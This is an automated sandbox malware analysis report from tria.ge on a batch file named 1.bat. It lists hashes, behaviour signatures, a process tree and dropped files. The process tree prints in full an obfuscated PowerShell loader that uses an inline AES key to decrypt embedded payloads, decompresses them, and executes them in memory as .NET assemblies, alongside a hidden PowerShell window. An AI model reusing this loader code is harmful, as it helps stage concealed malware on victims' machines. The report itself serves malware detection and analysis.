Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    28s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2023, 21:58

General

  • Target

    1.bat

  • Size

    53KB

  • MD5

    ec8c17c00514ef283f47eada16a9353f

  • SHA1

    c51c24ba6f64ad209da8a4fd8c6db932b151da57

  • SHA256

    5a38a43e7227ffb333f7350275f119c6d9dd94b8bcd278732501fb48302edefc

  • SHA512

    9247bc9cda4ab25c562cea815a81124d56507966c39ecfb1cf484e24317ce538c574c2857de7a7048cbedc5952c5da8c0853f05d67b72957739b27acc5c17484

  • SSDEEP

    1536:cGoAhinrWL+ALprkrDxefHnFylU8Nn5BPrf:ZoznrbALpelNnTP7

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:916
    • C:\Users\Admin\AppData\Local\Temp\1.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\1.bat.exe" $ClZY='LocGkfacGkfdcGkf'.Replace('cGkf', '');$Cosg='ReadcGkfLincGkfescGkf'.Replace('cGkf', '');$CKgZ='ChacGkfngcGkfeEcGkfxtecGkfnsicGkfoncGkf'.Replace('cGkf', '');$mdDK='CrcGkfeatecGkfDecGkfcrcGkfycGkfptorcGkf'.Replace('cGkf', '');$dpRd='TcGkfracGkfncGkfscGkfforcGkfmcGkfFcGkfinalcGkfBcGkfloccGkfkcGkf'.Replace('cGkf', '');$TfJi='GetCcGkfucGkfrcGkfrcGkfecGkfntPcGkfrocGkfcescGkfscGkf'.Replace('cGkf', '');$ZaLV='MaicGkfnMocGkfdulecGkf'.Replace('cGkf', '');$YvXE='EncGkftcGkfrycGkfPocGkfintcGkf'.Replace('cGkf', '');$yvfJ='FcGkfircGkfstcGkf'.Replace('cGkf', '');$nlTT='IcGkfnvcGkfokcGkfecGkf'.Replace('cGkf', '');$xbeG='ScGkfplcGkfitcGkf'.Replace('cGkf', '');$dIab='FcGkfrocGkfmBacGkfsecGkf64cGkfStcGkfrincGkfgcGkf'.Replace('cGkf', '');function YGKaC($qnjQQ){$YTqCE=[System.Security.Cryptography.Aes]::Create();$YTqCE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YTqCE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YTqCE.Key=[System.Convert]::$dIab('tnhK18G6AEhO+6UA39Ny8OROXuxQ7/wL8/6fO39b1SY=');$YTqCE.IV=[System.Convert]::$dIab('01lBIYEpZO5++Co5QPW0Pw==');$MuNSz=$YTqCE.$mdDK();$XtiHW=$MuNSz.$dpRd($qnjQQ,0,$qnjQQ.Length);$MuNSz.Dispose();$YTqCE.Dispose();$XtiHW;}function fCuOF($qnjQQ){$lbzbE=New-Object System.IO.MemoryStream(,$qnjQQ);$snKTq=New-Object System.IO.MemoryStream;$dKObF=New-Object System.IO.Compression.GZipStream($lbzbE,[IO.Compression.CompressionMode]::Decompress);$dKObF.CopyTo($snKTq);$dKObF.Dispose();$lbzbE.Dispose();$snKTq.Dispose();$snKTq.ToArray();}$wXZyX=[System.Linq.Enumerable]::$yvfJ([System.IO.File]::$Cosg([System.IO.Path]::$CKgZ([System.Diagnostics.Process]::$TfJi().$ZaLV.FileName, $null)));$AiqYs=$wXZyX.Substring(3).$xbeG(':');$TXfSg=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[0])));$wjSXh=fCuOF (YGKaC ([Convert]::$dIab($AiqYs[1])));[System.Reflection.Assembly]::$ClZY([byte[]]$wjSXh).$YvXE.$nlTT($null,$null);[System.Reflection.Assembly]::$ClZY([byte[]]$TXfSg).$YvXE.$nlTT($null,$null);
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:960

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1.bat.exe

    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

  • memory/916-58-0x000000001AFC0000-0x000000001B2A2000-memory.dmp

    Filesize

    2.9MB

  • memory/916-59-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

  • memory/916-60-0x00000000024B0000-0x0000000002530000-memory.dmp

    Filesize

    512KB

  • memory/916-61-0x00000000024B0000-0x0000000002530000-memory.dmp

    Filesize

    512KB

  • memory/916-62-0x00000000024B0000-0x0000000002530000-memory.dmp

    Filesize

    512KB

  • memory/916-63-0x00000000024BB000-0x00000000024F2000-memory.dmp

    Filesize

    220KB

  • memory/960-69-0x00000000005F0000-0x0000000000630000-memory.dmp

    Filesize

    256KB